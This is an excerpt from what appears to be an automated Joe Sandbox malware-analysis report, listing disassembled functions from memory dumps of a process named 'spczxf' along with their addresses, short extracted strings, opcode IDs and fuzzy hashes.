                                                                                                                                                                                            • Opcode ID: a0169b48f6e2110d29cb9cc407e4823f489d2a301aa9587e0ae0eb15a61c4148
                                                                                                                                                                                            • Instruction ID: c67223d543afc54236ea3468fa9e5be2389cf0b432e4eeccc44174fcb20b8d3b
                                                                                                                                                                                            • Opcode Fuzzy Hash: a0169b48f6e2110d29cb9cc407e4823f489d2a301aa9587e0ae0eb15a61c4148
                                                                                                                                                                                            • Instruction Fuzzy Hash: 9A81F875A1CA4A8FE758FB28D4554BA73E1FF95311B00463EE48FC3296DE24F84A46C1
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00007FFAAC24AEF0 Relevance: 10.0, Strings: 8, Instructions: 1COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000008.00000002.1743126146.00007FFAAC240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC240000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_8_2_7ffaac240000_spczxf.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: 6_$ b$ b$P*i$P*i$P/i$[`$[`
                                                                                                                                                                                            • API String ID: 0-3334087465
                                                                                                                                                                                            • Opcode ID: 1660a0c239169a4099eb8f064890101dc874860b2ba103181128cae6f5850edc
                                                                                                                                                                                            • Instruction ID: 92dbcb6e6e780857d17eda46da6590c572f4dc0aad80a0b650b69c10039d3ec8
                                                                                                                                                                                            • Opcode Fuzzy Hash: 1660a0c239169a4099eb8f064890101dc874860b2ba103181128cae6f5850edc
                                                                                                                                                                                            • Instruction Fuzzy Hash:
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00007FFAAC241A99 Relevance: 4.2, Strings: 3, Instructions: 469COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000008.00000002.1743126146.00007FFAAC240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC240000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_8_2_7ffaac240000_spczxf.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: 0Wi$r6_$#3O_^
                                                                                                                                                                                            • API String ID: 0-1431944927
                                                                                                                                                                                            • Opcode ID: fd3effa65dd75b0a158a99a7d5ba0c70c3dff2f1b9fe2b0de65f3daed62e306a
                                                                                                                                                                                            • Instruction ID: 320e8cf88c3e2529e00b5d468cc5c36d8dde8daa28d7c715dd082ab12e0acea3
                                                                                                                                                                                            • Opcode Fuzzy Hash: fd3effa65dd75b0a158a99a7d5ba0c70c3dff2f1b9fe2b0de65f3daed62e306a
                                                                                                                                                                                            • Instruction Fuzzy Hash: 79E11771A09A0E8FF798FB78C4556B97BE1EF95350F0041B9D44ED7396DE28AC0A8780
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00007FFAAC24A6F1 Relevance: 4.2, Strings: 3, Instructions: 446COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000008.00000002.1743126146.00007FFAAC240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC240000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_8_2_7ffaac240000_spczxf.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: "9_$"9_$"9_
                                                                                                                                                                                            • API String ID: 0-2606864787
                                                                                                                                                                                            • Opcode ID: 6a9caef9a8ade5e765a763a34282b8c1f7bb8385f2644423b0b4a7ea3abd382e
                                                                                                                                                                                            • Instruction ID: f65862cf63043415fa66eadfd8b34ac5a42f18140e19c51b3d84ddfd24eb7850
                                                                                                                                                                                            • Opcode Fuzzy Hash: 6a9caef9a8ade5e765a763a34282b8c1f7bb8385f2644423b0b4a7ea3abd382e
                                                                                                                                                                                            • Instruction Fuzzy Hash: ECC14921A1DA56CFF319AB25C5911B977D1EF92310B58817DD08F972CADD2CF88B82C0
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00007FFAACBA026B Relevance: 3.4, Strings: 2, Instructions: 942COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000008.00000002.1755217188.00007FFAACBA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACBA0000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_8_2_7ffaacba0000_spczxf.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: "9_$A
                                                                                                                                                                                            • API String ID: 0-991652786
                                                                                                                                                                                            • Opcode ID: cbbfe0c34d874a52bd4ad06d203a00bce283874f795febbc80d74ab8d6b0a3d7
                                                                                                                                                                                            • Instruction ID: 1d9c0ac48924d1afc29f2625bf0a2da422568693977f6e2af999145ed308f56c
                                                                                                                                                                                            • Opcode Fuzzy Hash: cbbfe0c34d874a52bd4ad06d203a00bce283874f795febbc80d74ab8d6b0a3d7
                                                                                                                                                                                            • Instruction Fuzzy Hash: E152057180E7968FF756DB28D8555A47FA0EF67700F0845FED0CE8B192DA29A80AC7C1
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00007FFAAC241E2F Relevance: 2.7, Strings: 2, Instructions: 156COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000008.00000002.1743126146.00007FFAAC240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC240000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_8_2_7ffaac240000_spczxf.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: 6_$ O_H
                                                                                                                                                                                            • API String ID: 0-1753639010
                                                                                                                                                                                            • Opcode ID: 0f073cc097426c7205e3463da69fc78504b95a3c8e12fafb54617c39fe8eae2e
                                                                                                                                                                                            • Instruction ID: 01b5a02a704f46629fa6b9eee497cefe59339c5a80de92f3bca1ec2803462513
                                                                                                                                                                                            • Opcode Fuzzy Hash: 0f073cc097426c7205e3463da69fc78504b95a3c8e12fafb54617c39fe8eae2e
                                                                                                                                                                                            • Instruction Fuzzy Hash: 6E411531759D498FEB84FB2CC459AA877E2EFA931070541BAD00EC73A6CE64DC4AC780
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00007FFAACBA0E29 Relevance: 1.7, Strings: 1, Instructions: 416COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000008.00000002.1755217188.00007FFAACBA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACBA0000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_8_2_7ffaacba0000_spczxf.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: 6_
                                                                                                                                                                                            • API String ID: 0-719347557
                                                                                                                                                                                            • Opcode ID: e8272adfb15aa9b732dff135b5ad79d8f31fd4e7bd726a8212de31a8b9c83f1d
                                                                                                                                                                                            • Instruction ID: cf96402fbdfbc2460d4954716c8cf2b8181364240386aa88a22d8d0df41392b3
                                                                                                                                                                                            • Opcode Fuzzy Hash: e8272adfb15aa9b732dff135b5ad79d8f31fd4e7bd726a8212de31a8b9c83f1d
                                                                                                                                                                                            • Instruction Fuzzy Hash: F1C1487290E7D98FE756DB2498551A47FA0EF57610F0981FAC0CECB1A3D929980EC3D2
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00007FFAAC24E4D8 Relevance: 1.5, Strings: 1, Instructions: 235COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000008.00000002.1743126146.00007FFAAC240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC240000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_8_2_7ffaac240000_spczxf.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: aN_I
                                                                                                                                                                                            • API String ID: 0-3942209311
                                                                                                                                                                                            • Opcode ID: 9d465ffaaa4aadbe1aa261588f0ef1a3a0ecfa193adef87e557abf2decdc9c1c
                                                                                                                                                                                            • Instruction ID: efdef100eae333b7371c2a8aef11559b3f4640d7760bf31c5834128f4714dcd8
                                                                                                                                                                                            • Opcode Fuzzy Hash: 9d465ffaaa4aadbe1aa261588f0ef1a3a0ecfa193adef87e557abf2decdc9c1c
                                                                                                                                                                                            • Instruction Fuzzy Hash: D5611753A0EAD18BF215737CE9150F8AB90EF42710B0881BBD0DDCB69BE819D94E83D5
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00007FFAAC24ACB0 Relevance: 1.5, Strings: 1, Instructions: 228COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000008.00000002.1743126146.00007FFAAC240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC240000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_8_2_7ffaac240000_spczxf.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: d
                                                                                                                                                                                            • API String ID: 0-2564639436
                                                                                                                                                                                            • Opcode ID: a698abe9fd9e486bd6c4867280f64530e683835e52edd1f4b694d919d023aa50
                                                                                                                                                                                            • Instruction ID: 17ce2ea6ffa1d0310d8f11e96479328c1dba1140c11b9b2ed71ed892ab750a58
                                                                                                                                                                                            • Opcode Fuzzy Hash: a698abe9fd9e486bd6c4867280f64530e683835e52edd1f4b694d919d023aa50
                                                                                                                                                                                            • Instruction Fuzzy Hash: B861D071A19E098BF74CEF18D58297173D0FB5A304B1481B8D94EC729BEA25F85ACAC1
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00007FFAAC24D5F6 Relevance: 1.4, Strings: 1, Instructions: 198COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000008.00000002.1743126146.00007FFAAC240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC240000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_8_2_7ffaac240000_spczxf.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: +0
                                                                                                                                                                                            • API String ID: 0-3029883225
                                                                                                                                                                                            • Opcode ID: 54a0bf1f915908c630514d274eb4860c13c9cdb19e1c72f6c299a12ba27c5f19
                                                                                                                                                                                            • Instruction ID: 02fa7d234ca23d49b52b6dc2bc4a2c549e07e5d3fba043f834eacf70ad518c20
                                                                                                                                                                                            • Opcode Fuzzy Hash: 54a0bf1f915908c630514d274eb4860c13c9cdb19e1c72f6c299a12ba27c5f19
                                                                                                                                                                                            • Instruction Fuzzy Hash: 2951B33590991A8FEF88EF18C451AE973E1FF55314F1045A9D01EDB2AACA35F84ACBC0
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00007FFAAC24F1CA Relevance: 1.4, Strings: 1, Instructions: 171COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000008.00000002.1743126146.00007FFAAC240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC240000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_8_2_7ffaac240000_spczxf.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: p]i
                                                                                                                                                                                            • API String ID: 0-3824986665
                                                                                                                                                                                            • Opcode ID: 741cfaece5c721c4b94868ae9c57d2b50608e5188f10a17510703d24e8d05a47
                                                                                                                                                                                            • Instruction ID: e4fbfba4f1ca37beb37cd002a410dbbfd5b61e0ca7d6d87c946e8fa412a9562e
                                                                                                                                                                                            • Opcode Fuzzy Hash: 741cfaece5c721c4b94868ae9c57d2b50608e5188f10a17510703d24e8d05a47
                                                                                                                                                                                            • Instruction Fuzzy Hash: 2C511956A0EB898FF355AA78441A2B63BD1DF96660F4841BED08DCB3E7DC1C5C0E4391
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00007FFAAC24F20A Relevance: 1.4, Strings: 1, Instructions: 157COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000008.00000002.1743126146.00007FFAAC240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC240000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_8_2_7ffaac240000_spczxf.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: p]i
                                                                                                                                                                                            • API String ID: 0-3824986665
                                                                                                                                                                                            • Opcode ID: a68850d0068c1462db263dec395540497879f3980206034af284a0c5b3ea4f0f
                                                                                                                                                                                            • Instruction ID: 7988ada46169de58cc49440eb8d31b18d0c277191c99e76112fa9366ad6ad847
                                                                                                                                                                                            • Opcode Fuzzy Hash: a68850d0068c1462db263dec395540497879f3980206034af284a0c5b3ea4f0f
                                                                                                                                                                                            • Instruction Fuzzy Hash: ED412A52A0DB898FF395A67C442A6A62BD1DF96660F0841BED08DCB3E7DC0C5C0E4391
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00007FFAAC24BBE5 Relevance: 1.3, Strings: 1, Instructions: 80COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000008.00000002.1743126146.00007FFAAC240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC240000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_8_2_7ffaac240000_spczxf.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: 6_
                                                                                                                                                                                            • API String ID: 0-719347557
                                                                                                                                                                                            • Opcode ID: aa54776a65acaa9581ed3ff407e79723c27a10560de9c978d52ee77f0e41ef65
                                                                                                                                                                                            • Instruction ID: 166acc118a67949f8e66554726743de822b73ccc16ecabd9d26b0bdb0144423f
                                                                                                                                                                                            • Opcode Fuzzy Hash: aa54776a65acaa9581ed3ff407e79723c27a10560de9c978d52ee77f0e41ef65
                                                                                                                                                                                            • Instruction Fuzzy Hash: 36215B31A0DF848FD381E728D4545657FE1EF9A221B0802BBE48CC73A7CA24E949C3C2
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00007FFAAC249949 Relevance: 1.3, Strings: 1, Instructions: 66COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000008.00000002.1743126146.00007FFAAC240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC240000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_8_2_7ffaac240000_spczxf.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: r6_
                                                                                                                                                                                            • API String ID: 0-2221659926
                                                                                                                                                                                            • Opcode ID: 5c0b3c47687653d21a79581a4dc790072caed8ea4dd238b140df424c5bacece8
                                                                                                                                                                                            • Instruction ID: d601305f9c5befb4b171b5be6cee3e3624450bd2462341a06ec760a39acc3699
                                                                                                                                                                                            • Opcode Fuzzy Hash: 5c0b3c47687653d21a79581a4dc790072caed8ea4dd238b140df424c5bacece8
                                                                                                                                                                                            • Instruction Fuzzy Hash: 89110C31B09A544FD744EB7C58591E9BBD1DFCA210B0887BBD40DC7356ED69980A43C1
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00007FFAAC24E3E0 Relevance: 1.3, Strings: 1, Instructions: 62COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000008.00000002.1743126146.00007FFAAC240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC240000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_8_2_7ffaac240000_spczxf.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: r6_
                                                                                                                                                                                            • API String ID: 0-2221659926
                                                                                                                                                                                            • Opcode ID: a183d1f08c8b283e0730b87aaf941e9a67179de5ccc5f169e2c497bd8eaee201
                                                                                                                                                                                            • Instruction ID: 6752c09017f7aba98ebfea60ebf98e3f1dfbad715d9b6a4b6e72d7353c0c8d41
                                                                                                                                                                                            • Opcode Fuzzy Hash: a183d1f08c8b283e0730b87aaf941e9a67179de5ccc5f169e2c497bd8eaee201
                                                                                                                                                                                            • Instruction Fuzzy Hash: D8112F31B199564BF75CFB2CD8564B677D1EB85310704867AD48FC33A5DE18E84542C0
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00007FFAAC249979 Relevance: 1.3, Strings: 1, Instructions: 61COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000008.00000002.1743126146.00007FFAAC240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC240000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_8_2_7ffaac240000_spczxf.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: r6_
                                                                                                                                                                                            • API String ID: 0-2221659926
                                                                                                                                                                                            • Opcode ID: b147233d48f5c450c54f0892761edf1eba5886d87ff051134152f6b355d79abd
                                                                                                                                                                                            • Instruction ID: f13422427fa9d45ad5a83043d6b91e867b8685e6773ef837e6618b6f121a44c0
                                                                                                                                                                                            • Opcode Fuzzy Hash: b147233d48f5c450c54f0892761edf1eba5886d87ff051134152f6b355d79abd
                                                                                                                                                                                            • Instruction Fuzzy Hash: F901D62170EB894FD346DB6C58541A57FE1DFCA21470942FBD44DC726BDD689C0A83D2
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00007FFAAC241C2B Relevance: 1.3, Strings: 1, Instructions: 53COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000008.00000002.1743126146.00007FFAAC240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC240000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_8_2_7ffaac240000_spczxf.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: r6_
                                                                                                                                                                                            • API String ID: 0-2221659926
                                                                                                                                                                                            • Opcode ID: fff91f287d5217f8f0ee1b85edc33dcef6fa9fee0cc06bb5ea3fb4f10d55b9c5
                                                                                                                                                                                            • Instruction ID: 3f3c2a72377d29056871fb6bafe61283cf6817062fb0841046ed146d633ae263
                                                                                                                                                                                            • Opcode Fuzzy Hash: fff91f287d5217f8f0ee1b85edc33dcef6fa9fee0cc06bb5ea3fb4f10d55b9c5
                                                                                                                                                                                            • Instruction Fuzzy Hash: 5C11A7A1C0964A4FE706FBF0C8669EDBFA0EF11300F4041B9C00AEB196DE6854498381
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00007FFAAC241C19 Relevance: 1.3, Strings: 1, Instructions: 46COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000008.00000002.1743126146.00007FFAAC240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC240000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_8_2_7ffaac240000_spczxf.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: r6_
                                                                                                                                                                                            • API String ID: 0-2221659926
                                                                                                                                                                                            • Opcode ID: 0a64294af164b4af6e382762e5238c4cdf2cbbdb30be88cb9fc26602922cfc80
                                                                                                                                                                                            • Instruction ID: 102f38b99bb9b5df7ade2b1652b31ef2deecaa59a84c5ca8cf332ebc86b13686
                                                                                                                                                                                            • Opcode Fuzzy Hash: 0a64294af164b4af6e382762e5238c4cdf2cbbdb30be88cb9fc26602922cfc80
                                                                                                                                                                                            • Instruction Fuzzy Hash: BB0192A1D4964A8FE74AFBF0C8665BCBED1AF15350F4085BDC00EEB296EE58584C4392
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00007FFAAC24EB47 Relevance: .5, Instructions: 492COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000008.00000002.1743126146.00007FFAAC240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC240000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_8_2_7ffaac240000_spczxf.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 6f4b17d670b02351dfb6e7ec25d8bdbf2863d5eaff2a684897be62db02877ece
                                                                                                                                                                                            • Instruction ID: ff268df0d1b0288e9226f4106ebd504101e2fae964ded526aca0132334145e01
                                                                                                                                                                                            • Opcode Fuzzy Hash: 6f4b17d670b02351dfb6e7ec25d8bdbf2863d5eaff2a684897be62db02877ece
                                                                                                                                                                                            • Instruction Fuzzy Hash: 5AF11572A0EA89CFF755E768D8555F9BBE0EF52310B0840BAD04DC72A7CA24D80EC795
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00007FFAAC249D40 Relevance: .5, Instructions: 477COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000008.00000002.1743126146.00007FFAAC240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC240000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_8_2_7ffaac240000_spczxf.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 2ac1b59f8cd67bf66d7d34569b6b2e9916f5f78b6925ae93f63daabdf0aa4f7e
                                                                                                                                                                                            • Instruction ID: 8fc1da0ec9cc1dc5a9b4518c0149d19517947dfffabad090b584741aa7779587
                                                                                                                                                                                            • Opcode Fuzzy Hash: 2ac1b59f8cd67bf66d7d34569b6b2e9916f5f78b6925ae93f63daabdf0aa4f7e
                                                                                                                                                                                            • Instruction Fuzzy Hash: 4BE1273191E6868FF365AB2488515B5BBD0EF67310F0445BED48EC7296EA18F40E87D1
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00007FFAAC248980 Relevance: .2, Instructions: 248COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000008.00000002.1743126146.00007FFAAC240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC240000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_8_2_7ffaac240000_spczxf.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 07d6f95da505786fd65d140b511a5c452c754cb13224d3761e3746abf40bd98b
                                                                                                                                                                                            • Instruction ID: 84a663564fa11b4e8a5f9c2b970c236c0d41f5609525e96677c21d29aa094fe5
                                                                                                                                                                                            • Opcode Fuzzy Hash: 07d6f95da505786fd65d140b511a5c452c754cb13224d3761e3746abf40bd98b
                                                                                                                                                                                            • Instruction Fuzzy Hash: 3F710431529A098FE719EB18D8415B6B3E0FF56304B1085BDD48FC769ADA39F80B87C1
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00007FFAAC24AF35 Relevance: .2, Instructions: 247COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000008.00000002.1743126146.00007FFAAC240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC240000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_8_2_7ffaac240000_spczxf.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 9d9ff4c098bd1881e0dd58a6ed985aa4c0bfc1012bf82391c74dbdc30019e401
                                                                                                                                                                                            • Instruction ID: 3f823d1c02f43881e2c7a0eee31d05eb9b4b8d867763eca6373372c2deddc64c
                                                                                                                                                                                            • Opcode Fuzzy Hash: 9d9ff4c098bd1881e0dd58a6ed985aa4c0bfc1012bf82391c74dbdc30019e401
                                                                                                                                                                                            • Instruction Fuzzy Hash: 4771043160E95D8FE758FF1CD4556BA37D0EF86311B1441BEE44EC729ACD28A84A87C0
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00007FFAAC24DF50 Relevance: .2, Instructions: 238COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000008.00000002.1743126146.00007FFAAC240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC240000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_8_2_7ffaac240000_spczxf.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 1e6b54ff363ca327e91605dacb201d4b1322bf01da4b0fed1fd70b8cb935f74e
                                                                                                                                                                                            • Instruction ID: 9c5d9786f3d13e0a6579ef60d1fcb014805967c08175c10e94ce697c36ca513d
                                                                                                                                                                                            • Opcode Fuzzy Hash: 1e6b54ff363ca327e91605dacb201d4b1322bf01da4b0fed1fd70b8cb935f74e
                                                                                                                                                                                            • Instruction Fuzzy Hash: 1371A43091961ECFFB49EF18C5809A9B7A2FF95304B148579D01ED729ADA35E889C7C0
